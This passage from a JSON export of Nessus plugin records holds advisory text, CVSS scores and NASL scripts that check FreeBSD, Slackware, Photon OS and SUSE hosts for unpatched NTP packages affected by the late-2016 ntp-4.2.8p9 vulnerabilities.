reference:\"ntp-debuginfo-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-debuginfo-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-debuginfo-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-debuginfo-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-debuginfo-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-debuginfo-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-debuginfo-4.2.8p9-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T10:55:07", "description": "Network Time Foundation reports :\n\nNTF's NTP Project is releasing ntp-4.2.8p9, which addresses :\n\n- 1 HIGH severity vulnerability that only affects Windows\n\n- 2 MEDIUM severity vulnerabilities\n\n- 2 MEDIUM/LOW severity vulnerabilities\n\n- 5 LOW severity vulnerabilities\n\n- 28 other non-security fixes and improvements\n\nAll of the security issues in this release are listed in VU#633847.", "edition": 33, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-11-23T00:00:00", "title": "FreeBSD : ntp -- multiple vulnerabilities (8db8d62a-b08b-11e6-8eba-d050996490d0)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9312", "CVE-2016-7434", "CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "modified": "2016-11-23T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ntp-devel", "p-cpe:/a:freebsd:freebsd:ntp"], "id": "FREEBSD_PKG_8DB8D62AB08B11E68EBAD050996490D0.NASL", "href": "https://www.tenable.com/plugins/nessus/95265", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95265);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-7426\", \"CVE-2016-7427\", \"CVE-2016-7428\", \"CVE-2016-7429\", \"CVE-2016-7431\", \"CVE-2016-7433\", \"CVE-2016-7434\", \"CVE-2016-9310\", \"CVE-2016-9311\", \"CVE-2016-9312\");\n script_xref(name:\"CERT\", value:\"633847\");\n\n script_name(english:\"FreeBSD : ntp -- multiple vulnerabilities (8db8d62a-b08b-11e6-8eba-d050996490d0)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Network Time Foundation reports :\n\nNTF's NTP Project is releasing ntp-4.2.8p9, which addresses :\n\n- 1 HIGH severity vulnerability that only affects Windows\n\n- 2 MEDIUM severity vulnerabilities\n\n- 2 MEDIUM/LOW severity vulnerabilities\n\n- 5 LOW severity vulnerabilities\n\n- 28 other non-security fixes and improvements\n\nAll of the security issues in this release are listed in VU#633847.\"\n );\n # http://support.ntp.org/bin/view/Main/SecurityNotice#November_2016_ntp_4_2_8p9_NTP_Se\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?08645c8c\"\n );\n # https://vuxml.freebsd.org/freebsd/8db8d62a-b08b-11e6-8eba-d050996490d0.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1bdee1b1\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ntp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ntp<4.2.8p9\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ntp-devel>0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T09:10:56", "description": "New ntp packages are available for Slackware 13.0, 13.1, 13.37, 14.0,\n14.1, 14.2, and -current to fix security issues.", "edition": 24, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-11-22T00:00:00", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : ntp (SSA:2016-326-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9312", "CVE-2016-7434", "CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "modified": "2016-11-22T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:13.0", "p-cpe:/a:slackware:slackware_linux:ntp", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.1"], "id": "SLACKWARE_SSA_2016-326-01.NASL", "href": "https://www.tenable.com/plugins/nessus/95028", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-326-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95028);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-7426\", \"CVE-2016-7427\", \"CVE-2016-7428\", \"CVE-2016-7429\", \"CVE-2016-7431\", \"CVE-2016-7433\", \"CVE-2016-7434\", \"CVE-2016-9310\", \"CVE-2016-9311\", \"CVE-2016-9312\");\n script_xref(name:\"SSA\", value:\"2016-326-01\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : ntp (SSA:2016-326-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New ntp packages are available for Slackware 13.0, 13.1, 13.37, 14.0,\n14.1, 14.2, and -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.641761\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?271e3ad7\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ntp package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"i486\", pkgnum:\"1_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"ntp\", pkgver:\"4.2.8p9\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-02-08T12:48:10", "description": "An update of [guile,ntp] packages for PhotonOS has been released.", "edition": 4, "published": "2018-08-17T00:00:00", "title": "Photon OS 1.0: Guile / Ntp / Ntpstat PHSA-2017-0003 (deprecated)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7434", "CVE-2016-8606", "CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "modified": "2019-02-07T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:ntpstat", "p-cpe:/a:vmware:photonos:ntp", "cpe:/o:vmware:photonos:1.0", "p-cpe:/a:vmware:photonos:guile"], "id": "PHOTONOS_PHSA-2017-0003.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111852", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0003. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111852);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/02/07 18:59:50\");\n\n script_cve_id(\n \"CVE-2016-7426\",\n \"CVE-2016-7427\",\n \"CVE-2016-7428\",\n \"CVE-2016-7429\",\n \"CVE-2016-7431\",\n \"CVE-2016-7433\",\n \"CVE-2016-7434\",\n \"CVE-2016-8606\",\n \"CVE-2016-9310\",\n \"CVE-2016-9311\"\n );\n\n script_name(english:\"Photon OS 1.0: Guile / Ntp / Ntpstat PHSA-2017-0003 (deprecated)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of [guile,ntp] packages for PhotonOS has been released.\");\n # https://github.com/vmware/photon/wiki/Security-Updates-19\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7dd0a069\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-8606\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:guile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:ntpstat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"guile-2.0.13-1.ph1\",\n \"guile-debuginfo-2.0.13-1.ph1\",\n \"guile-devel-2.0.13-1.ph1\",\n \"ntp-4.2.8p9-1.ph1\",\n \"ntp-debuginfo-4.2.8p9-1.ph1\",\n \"ntpstat-4.2.8p9-1.ph1\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-1.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"guile / ntp / ntpstat\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-01-20T14:46:56", "description": "This update for ntp fixes the following issues :\n\n - Simplify ntpd's search for its own executable to prevent\n AppArmor warnings (bsc#956365). Security issues fixed\n (update to 4.2.8p9) :\n\n - CVE-2016-9311, CVE-2016-9310, bsc#1011377: Mode 6\n unauthenticated trap information disclosure and DDoS\n vector.\n\n - CVE-2016-7427, bsc#1011390: Broadcast Mode Replay\n Prevention DoS.\n\n - CVE-2016-7428, bsc#1011417: Broadcast Mode Poll Interval\n Enforcement DoS.\n\n - CVE-2016-7431, bsc#1011395: Regression: 010-origin: Zero\n Origin Timestamp Bypass.\n\n - CVE-2016-7434, bsc#1011398: NULL pointer dereference in\n _IO_str_init_static_internal().\n\n - CVE-2016-7429, bsc#1011404: Interface selection attack.\n\n - CVE-2016-7426, bsc#1011406: Client rate limiting and\n server responses.\n\n - CVE-2016-7433, bsc#1011411: Reboot sync calculation\n problem.\n\n - CVE-2015-5219: An endless loop due to incorrect\n precision to double conversion (bsc#943216).\n\n - CVE-2015-8140: ntpq vulnerable to replay attacks.\n\n - CVE-2015-8139: Origin Leak: ntpq and ntpdc, disclose\n origin.\n\n - CVE-2015-5219: An endless loop due to incorrect\n precision to double conversion (bsc#943216).\n Non-security issues fixed :\n\n - Fix a spurious error message.\n\n - Other bugfixes, see\n /usr/share/doc/packages/ntp/ChangeLog.\n\n - Fix a regression in 'trap' (bsc#981252).\n\n - Reduce the number of netlink groups to listen on for\n changes to the local network setup (bsc#992606).\n\n - Fix segfault in 'sntp -a' (bsc#1009434).\n\n - Silence an OpenSSL version warning (bsc#992038).\n\n - Make the resolver task change user and group IDs to the\n same values as the main task. (bsc#988028)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 39, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-12-21T00:00:00", "title": "SUSE SLES11 Security Update : ntp (SUSE-SU-2016:3193-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-8140", "CVE-2016-7434", "CVE-2016-9311", "CVE-2015-5219", "CVE-2016-7433", "CVE-2015-8139", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "modified": "2016-12-21T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:ntp-doc", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:ntp"], "id": "SUSE_SU-2016-3193-1.NASL", "href": "https://www.tenable.com/plugins/nessus/95986", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:3193-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95986);\n script_version(\"3.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-5219\", \"CVE-2015-8139\", \"CVE-2015-8140\", \"CVE-2016-7426\", \"CVE-2016-7427\", \"CVE-2016-7428\", \"CVE-2016-7429\", \"CVE-2016-7431\", \"CVE-2016-7433\", \"CVE-2016-7434\", \"CVE-2016-9310\", \"CVE-2016-9311\");\n\n script_name(english:\"SUSE SLES11 Security Update : ntp (SUSE-SU-2016:3193-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ntp fixes the following issues :\n\n - Simplify ntpd's search for its own executable to prevent\n AppArmor warnings (bsc#956365). Security issues fixed\n (update to 4.2.8p9) :\n\n - CVE-2016-9311, CVE-2016-9310, bsc#1011377: Mode 6\n unauthenticated trap information disclosure and DDoS\n vector.\n\n - CVE-2016-7427, bsc#1011390: Broadcast Mode Replay\n Prevention DoS.\n\n - CVE-2016-7428, bsc#1011417: Broadcast Mode Poll Interval\n Enforcement DoS.\n\n - CVE-2016-7431, bsc#1011395: Regression: 010-origin: Zero\n Origin Timestamp Bypass.\n\n - CVE-2016-7434, bsc#1011398: NULL pointer dereference in\n _IO_str_init_static_internal().\n\n - CVE-2016-7429, bsc#1011404: Interface selection attack.\n\n - CVE-2016-7426, bsc#1011406: Client rate limiting and\n server responses.\n\n - CVE-2016-7433, bsc#1011411: Reboot sync calculation\n problem.\n\n - CVE-2015-5219: An endless loop due to incorrect\n precision to double conversion (bsc#943216).\n\n - CVE-2015-8140: ntpq vulnerable to replay attacks.\n\n - CVE-2015-8139: Origin Leak: ntpq and ntpdc, disclose\n origin.\n\n - CVE-2015-5219: An endless loop due to incorrect\n precision to double conversion (bsc#943216).\n Non-security issues fixed :\n\n - Fix a spurious error message.\n\n - Other bugfixes, see\n /usr/share/doc/packages/ntp/ChangeLog.\n\n - Fix a regression in 'trap' (bsc#981252).\n\n - Reduce the number of netlink groups to listen on for\n changes to the local network setup (bsc#992606).\n\n - Fix segfault in 'sntp -a' (bsc#1009434).\n\n - Silence an OpenSSL version warning (bsc#992038).\n\n - Make the resolver task change user and group IDs to the\n same values as the main task. (bsc#988028)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1009434\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011390\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011395\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011398\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011404\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011406\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011411\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=943216\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=956365\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=981252\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=988028\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=992038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=992606\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5219/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8139/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 